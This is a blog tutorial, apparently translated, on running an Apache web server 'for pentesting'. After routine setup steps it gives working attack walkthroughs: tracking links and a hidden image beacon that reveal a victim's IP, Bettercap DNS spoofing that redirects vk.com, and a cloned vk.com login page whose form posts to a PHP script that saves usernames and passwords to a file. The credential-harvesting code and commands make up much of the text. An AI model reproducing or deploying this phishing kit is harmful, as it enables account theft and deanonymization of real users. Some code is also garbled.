Web server for pentester thing is very necessary

Web server for pentester thing is very necessary

Today the market has many different manufacturers and versions of web servers, here is a list of some: Apache is a free web server, most commonly used in UNIX-like operating systems, nginx a free web server developed by Igor Sysoev and today rivals Apache in popularity, IIS from Microsoft, distributed with the operating system family Windows, LiteSpeed Web Server – prietary web server, developed with a focus on performance, Google Web Server – proprietary web server used in Google’s web infrastructure.

The above servers are the most popular for 2020-2021. All other combined web servers, whose names are counted in tens, are used in less than 1% of web applications.



Defining the web server used in the application under test is a critical task for the tester. Knowing the type and version of the web server will allow the tester to determine if the server has known vulnerabilities and how to exploit them, which in turn can greatly change the testing process.

This information can be obtained by sending specific commands to a web server and analyzing the responses from that server, as different versions of servers may react differently to these commands. Note that in order to accurately identify a web server, it is usually necessary to send several different commands as different versions may respond to the same command in the same way. Rarely do different versions respond equally to all HTTP commands. Thus, by sending several different commands, the tester can make more accurate assumptions.

Examples of usage:.



    • phishing attacks
    • Substitution of original site with DNS spoofing
    • getting the IP target through social engineering
    • location of scripts for data collection on XSS vulnerabilities
    • gathering data from compromised systems, placing files for distribution
    • placement of JavaScript scripts and HTML code for embedding in man-in-the-middle and other attacks

 

With a certain skill on a web server you can even organize a port scanner and routers. Understanding at least the basics of the web server is necessary when testing for penetration of web applications, servers. And even more applications of this knowledge will find for “peaceful” purposes. In this article you will learn about the structure of web server folders and files, setting up subdomains and virtual hosts, web server logs, the basics of PHP and more.

This article will focus on Linux (primarily Kali Linux, Linux Mint, Ubuntu) and will also provide links for further study and work in other distributions as well as for working with a web server on Windows

In Linux

In Kali Linux the web server is installed by default. But it also does not start by default when your computer boots up. To run the web server in Kali Linux run it:

sudo systemctl start apache2.service

sudo systemctl start mysql.service

To test the server, open a web browser and go to the localhost page.

Linux Mint, Ubuntu

In these distributions the web server is not installed by default, but it is easy to do with several commands:

sudo apt-get update

sudo apt-get install apache2 mysql-server php libapache2-mod-php php-mysql php-xml php-gd php-imap php-mysql

sudo systemctl enable apache2

sudo systemctl enable mysql.service

Web Server Access

From the computer where the web server is installed, you can always access it by typing localhost or 127.0.0.1 in the browser.

From another computer, you can access the web server in three ways:

  • by local IP (from local network only)
  • by external IP (subject to certain conditions)
  • by domain name (external IP access required + purchased domain + DNS configuration)

To find out the IP address of your computer, type the command:

ip a

As you can see in the screenshot, in my case the IP of the computer 192.168.0.196. If I dial 192.168.0.196 in my web browser on another computer or cell phone connected to the same local network as the address of the site 192.168.0.196, I will get to the web server.

Web server file structure

The file you see by opening http://localhost/ is physically located in the /var/www/html/index.html path.

You can see for yourself by running the command (it tells the Firefox browser to open the file located in /var/www/html/index.html):

firefox /var/www/html/index.html

Let’s add more files and folders to see how the server works. But let us start by checking who owns the /var/ww/html/ directory:

ls -dl /var/www/html/

drwxr-xr-x 2 root root 4096 June 26 18:27 /var/www/html/

This directory belongs to the super user. All others have the right to read its content, but do not have the right to write. For us to make changes in it, we need to:

    • to make changes from root (use sudo or login as root) OR
    • make yourself the owner of this directory

The following command makes you the owner of the directory of the user under which you are logged in:

sudo chown -R $USER:$USER /var/www/html

Let’s check it again:

ls -dl /var/www/html/

drwxr-xr-x 2 mial 4096 June 26 18:27 /var/www/html/

Now, without increasing privileges, you can open this directory and add/remove/change files in it.

nemo /var/www/html/

Index files

When a web browser receives a request to show a certain directory without specifying a file, it starts looking for index files in that directory. Usually these files include index.html, index.php, index.htm and others (configured in Apache configuration files).

I.e. the address http://localhost/ and the address http://localhost/index.html will print the contents of the same file.

Create a test.htm file in the /var/www/html/ folder and copy the line “My very first file” there. You can do this by opening a file manager and going to the folder /var/www/html/, then opening any text editor, copy the line “My very first file” there and save it with the name test.htm.

I will do this from the command line:

echo “My very first file” > /var/www/html/test.htm

This command means to output (echo) a specified line (“My very first file”) by redirecting it (>) to the specified file (/var/www/html/test.htm).

So now we have the file /var/www/html/test.htm. If you open http://localhost/test.htm in your web browser you will see a line that was written to the file.

In the directory /var/ww/html/ let’s create the subdirectory site1:

mkdir /var/www/html/site1

As you can guess, this folder can be accessed by typing http://localhost/site1/ in your web browser.

In other words, the folder is simply empty.

Let’s create there one more text file:

echo “My second test file” > /var/www/html/site1/test2.htm

Now go to http://localhost/site1/.

And following the link http://localhost/site1/test2.htm we will see the content of this very file, i.e. the line “My second test file”.

There is no index file in /var/www/html/site1/ folder. Let’s create it:

echo “Just Index File” > /var/www/html/site1/index.htm

As you can guess, now typing http://localhost/site1/ instead of the file list we will see the index file.

IP Disclosure with social engineering

In the file /var/log/apache2/access.log records of all calls to the web-server are saved, among this information there is also the IP of the requestor.

To see the latest entries from this file:

sudo tail /var/log/apache2/access.log

Suppose we have formed an address http://192.168.0.196/site1/test2.htm?p=1112321 and sent it to the person whose IP we want to know.

This is the URL:

  • http://192.168.0.196 – address of our server (instead of IP it can be our domain – it is not principal)
  • site1/test2.htm is the file that will be shown to the target user
  • ?p=1112321 – after the question mark, you can specify variable names and the values passed to it, but in our example we use a unique line only to endow us with a search for the log file.

The following will appear in the log file:

192.168.0.244 – [05/Jul/2017:14:00:06 +0300] “GET /site1/test2.htm?p=1112321 HTTP/1.1” 200 303 “-” “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 OPR/46.0.2597.32”.

192.168.0.244 – [05/Jul/2017:14:00:07 +0300] “GET /favicon.ico HTTP/1.1” 404 504 “http://192.168.0.196/site1/test2.htm?p=1112321”. “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 OPR/46.0.2597.32”.

192.168.0.244 – [05/Jul/2017:14:00:58 +0300] “-” 408 0 “-” “-”

The line /site1/test2.htm?p=1112321 shows which address was requested. And 192.168.0.244 is the IP of the user we want to identify.

Despite its primitive nature, it is quite a working way of deanonymization. The link sent may contain something interesting for the target person (tests, funny pictures, anecdote – anything) so that he does not suspect a trick.

Alternatively, instead of searching for logs you can get an IP in a PHP script and send it to the attacker in the mail immediately.

Here you can see an example on the local network. Everything works exactly the same way on the Internet. You need an external IP or your domain name.

If you want to keep your anonymity and someone sends you a “check out” link [anything], of course, you should start by changing your IP, or using Tor Browser or any other anonymizer.

A more tricky way can be used when you are not asked to open the link.

Save any image on your server. For example I upload an image from https://hackware.ru/wp-content/uploads/2017/07/01.jpg and save it to /var/www/html/site1/pic.jpg:

wget -O /var/www/html/site1/pic.jpg https://hackware.ru/wp-content/uploads/2017/07/01.jpg.

Consequently, my picture is now available at http://192.168.0.196/site1/pic.jpg.

I, being an “intruder”, create a funny.html file with the following content:

<html>

<head>

<title>Interesting picture</title>

<meta charset=”UTF-8″>

<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>

</head>

<body>

<div>

<image src=”http://192.168.0.196/site1/pic.jpg?tag=4564564544″ alt=”Include picture display” />

</div>

</body>

</html>

And I send it to the “victim”. The “victim” does not need to go to some sites, and the file itself – a simple HTML document, opened in a regular web browser – all this can reduce the vigilance of the potential target. The file will open in a browser and there will simply be a (not very) funny picture. But since the picture was loaded from the attacker’s web server, he will have this entry in his logs:

192.168.0.244 – [05/Jul/2017:14:28:09 +0300] “GET /site1/pic.jpg?tag=4564564544 HTTP/1.1” 200 387504 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36″.

Obviously, we inserted an image into HTML code using the image tag:

<image src=”http://192.168.0.196/site1/pic.jpg?tag=4564564544″ alt=”Enable picture display” />

We could have done without the arbitrary line ?tag=4564564544 – it is only needed to make it easier to search through the logs and/or identify the “victim”, since I could send a file with the line ?tag=4564564544 to one person, the other ?tag=4564564545, the third ?tag=4564564546, etc.

Instead of an image, there may be a .js, .css or another file that can be loaded from a remote server without causing suspicion.

An HTML file can be an executable or batch file that makes a request to a server, a banal shortcut with a URL link, etc.

Virtual Host Creation

To understand how you can use virtual hosts in pentesting, consider the essence of DNS spoofing or how often it is called DNS spoofing.

When a user enters the address of a website, for example vk.com, into a line in his web browser, a request is made to the DNS server, from which it is asked: “what IP the site vk.com has”. The DNS finds a record for vk.com and replies that this site has IP 95.213.11.181. The user’s computer then connects to the web server at 95.213.11.181 asking “please show me the vk.com site”. The web server shows the right site, Pavel Durov (or who is there now instead) is happy.

The attacker can spoof the returned DNS response. When performing a man-in-the-middle attack, we can intercept the answer “95.213.11.181” and instead send “victim” the IP of our server, for example 192.168.0.196.

What happens in the long run? And then the victim’s computer will connect to our web server with the request “please show me vk.com”. And we… we will not upset the user and show him vk.com… the truth in its own way.

We’ll create a directory where the files will be placed (the name of the directory is unprincipled):

mkdir /var/ww/html/vk.com

Let’s create a file in this directory:

echo “VK light” > /var/www/html/vk.com/index.htm

Let’s make a copy of the virtual host configuration file:

sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/vk.com.conf

Let’s open it for editing:

sudo gedit /etc/apache2/sites-available/vk.com.conf

Without comments, the file looks like this:

<VirtualHost *:80>

ServerAdmin [email protected]

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log

CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

The DocumentRoot directive must be edited and the path to the directory where the virtual host files are located (in our case it is /var/www/html/vk.com). We also need to add the ServerName and ServerAlias directives with the address of our site. We got it:

<VirtualHost *:80>

ServerAdmin [email protected]

ServerName vk.com

ServerAlias www.vk.com

DocumentRoot /var/www/html/vk.com

ErrorLog ${APACHE_LOG_DIR}/error.log

CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>

Enable our virtual host:

sudo a2ensite vk.com.conf

Restart the server for the changes to take effect:

sudo systemctl restart apache2

Let’s check the status of the server to make sure that everything works:

systemctl status apache2

Now our server is ready.

I will show you an example of DNS spoofing when attacking a man in the middle with Bettercap. We will install Bettercap if it is not on your system. The following command for Kali Linux

sudo apt-get install bettercap

Let’s create a dns.conf file:

gedit dns.conf

Let’s copy it there:

local .*vk\.com

Launch the attack:

sudo bettercap -X –dns dns.conf

We see that the DNS response has been successfully spoofed

When trying to open the address http://vk.com in a web browser.

By the way, a web server can serve any number of virtual hosts. That is, you can set up mail.ru, yandex.ru, etc. next to vk.com.

And one more “by the way”: for DNS spoofing it is not necessary to conduct a man-in-the-middle attack. It is enough to change the settings of the “victim” network equipment by specifying there your “correctly” configured DNS.

Web Forms Work

It’s funny to torture with funny inscriptions of unhappy social network users, but not profiteering.

You can, of course, write there that by order of Roskomnadzor № 34539/21-2018 now entrance to vk.com is paid and to access the site you need to throw 50 rubles to the number 8905143xxxxx… but this is completely criminal – we will not do this, of course.

We will demonstrate the possibilities of DNS spoofing attack by trying to find out the user login and password from the contact.

We will make a directory where the site will be cloned:

mkdir websitesmirrors

Note that in the following commands I use the absolute path /home/mial/websitesmirrors/vk.com/ – you need to use your own (/root/websitesmirrors/vk.com/ if you are on Kali Linux).

httrack https://vk.com –headers “Accept-Language: ru-RU,ru;q=0.5” -r2 -F “Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36” -O “/home/mial/websitesmirrors/vk.com/”.

Delete the unnecessary index file:

rm /var/www/html/vk.com/index.htm

Copy files:

cp -r ~/websitesmirrors/vk.com/vk.com/* /var/www/html/vk.com/

We launch a man-in-the-middle attack together with DNS spoofing:

sudo bettercap -X –dns dns.conf

Now the site looks like the original one (although some images seem to be missing – let’s not get into it, for our example it’s insignificant).

But we need to “reconfigure” its form, which accepts and sends the login and password to login.

Typical form looks like this:

<form action=”pass.php” method=”POST” enctype=”multipart/form-data”>

Enter username: <input type=”text” name=”login”&gt”;

<br />

Enter password <input type=”password” name=”password”>

<br />

<input type=”reset”><input type=”submit”>

</form>

Here pass.php is the file where the form sends the data.

An example file is pass.php:

<?php

 

$text = “”;

foreach ($_POST as $key => $value) {

$text .= htmlspecialchars($key) . ” is ” . htmlspecialchars($value) . ” \r\n”;

}

file_put_contents(“pass.txt”, $text, FILE_APPEND);

 

header(‘Location: http://vk.com/’);

This file receives the entered login and password, saves it and redirects the user to the vk.com page (which is useless, because until DNS spoofing is over, it will be constantly coming to our virtual host).

Of course, this is a very primitive PHP code – you have to add checks for empty variables, etc., but it is enough to get acquainted.

I counted three forms on the vk.com login page. The one we need looks like this:

<form method=”post” name=”login” id=”index_login_form” action=”https://login.vk.com/?act=login”>

<input type=”hidden” name=”act” id=”act” value=”login”>

<input type=”hidden” name=”role” value=”al_frame” />

<input type=”hidden” name=”expire” id=”index_expire_input” value=” />

<input type=”hidden” name=”_origin” value=”index.html” />

<input type=”hidden” name=”ip_h” value=”d483530f9e9e8e6f98″ />

<input type=”hidden” name=”lg_h” value=”760276f5a8c4470e8e” />

<input type=”text” class=”big_text” name=”email” id=”index_email” value=” placeholder=”Phone or e-mail” />

<input type=”password” class=”big_text” name=”pass” id=”index_pass” value=” placeholder=”password” onkeyup=”toggle(‘index_expire’, !this.value);toggle(‘index_forgot’, !this.value)” />

<button id=”index_login_button” class=”index_login_button flat_button button_big_text”>Enter</button>

<div class=”forgot”>

<div class=”checkbox” id=”index_expire” onclick=”checkbox(this);ge(‘index_expire_input’). value=isChecked(this)?1:”; >Alien computer</div>

<a id=”index_forgot” class=”index_forgot” href=”restore.html” target=”_top”>Forget password?</a>

</div>

</form>

Immediately remove all fields that contain hidden, we get:

<form method=”post” name=”login” id=”index_login_form” action=”https://login.vk.com/?act=login”>

<input type=”text” class=”big_text” name=”email” id=”index_email” value=” placeholder=”phone or email” />

<input type=”password” class=”big_text” name=”pass” id=”index_pass” value=” placeholder=”password” onkeyup=”toggle(‘index_expire’, !this.value);toggle(‘index_forgot’, !this.value)”. />

<button id=”index_login_button” class=”index_login_button flat_button button_big_text”>Sign in</button>

<div class=”forgot”>

<div class=”checkbox” id=”index_expire” onclick=”checkbox(this);ge(‘index_expire_input’).value=isChecked(this)?1:”; >Alien computer</div>

<a id=”index_forgot” class=”index_forgot” href=”restore.html” target=”_top”>Forget password?</a>

</div>

</form>

Change action=”https://login.vk.com/?act=login” to action=”http://vk.com/pass.php”. Also delete name=”login” id=”index_login_form” so that scripts cannot change the standard behavior of the form:

<form method=”post” name=”login” id=”index_login_form” action=”http://vk.com/pass.php”&gt”;

<input type=”text” class=”big_text” name=”email” id=”index_email” value=” placeholder=”phone or email” />

<input type=”password” class=”big_text” name=”pass” id=”index_pass” value=” placeholder=”password” onkeyup=”toggle(‘index_expire’, !this.value);toggle(‘index_forgot’, !this.value)” />

<button id=”index_login_button” class=”index_login_button flat_button button_big_text”>Enter</button>

<div class=”forgot”>

<div class=”checkbox” id=”index_expire” onclick=”checkbox(this);ge(‘index_expire_input’). value=isChecked(this)?1:”; >Alien computer</div>

<a id=”index_forgot” class=”index_forgot” href=”restore.html” target=”_top”>Forget password?</a>

</div>

</form>

You can also shake up the form so that it doesn’t write about “unsafe input” when you enter data, but it already works and the material is already too voluminous, so we will stop at this point our work with the form.

On the server, we create a pass.php file with the content:

<?php

$text = “”;

foreach ($_POST as $key => $value) {

$text .= htmlspecialchars($key) . ” is ” . htmlspecialchars($value) . ” \r\n”;

}

file_put_contents(“pass.txt”, $text, FILE_APPEND);

header(‘Location: http://vk.com/’);

To avoid problems with writing to the pass.txt file, let’s create it beforehand:

touch /var/www/html/vk.com/pass.txt

And let everyone write it down:

sudo chmod 666 /var/www/html/vk.com/pass.txt

As soon as the user enters his login and password, they will be saved on the attacker’s web server.

Exclusion

We looked at (and very superficially) only a few examples of how a web server can help in penetration testing. Further learning the basics of how a web server works and how to configure it will help you better understand and organize attacks.

 

Source



WARNING! All links in the articles may lead to malicious sites or contain viruses. Follow them at your own risk. Those who purposely visit the article know what they are doing. Do not click on everything thoughtlessly.


4 Views

0 0 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments


Do NOT follow this link or you will be banned from the site!
0
Would love your thoughts, please comment.x
()
x

Spelling error report

The following text will be sent to our editors: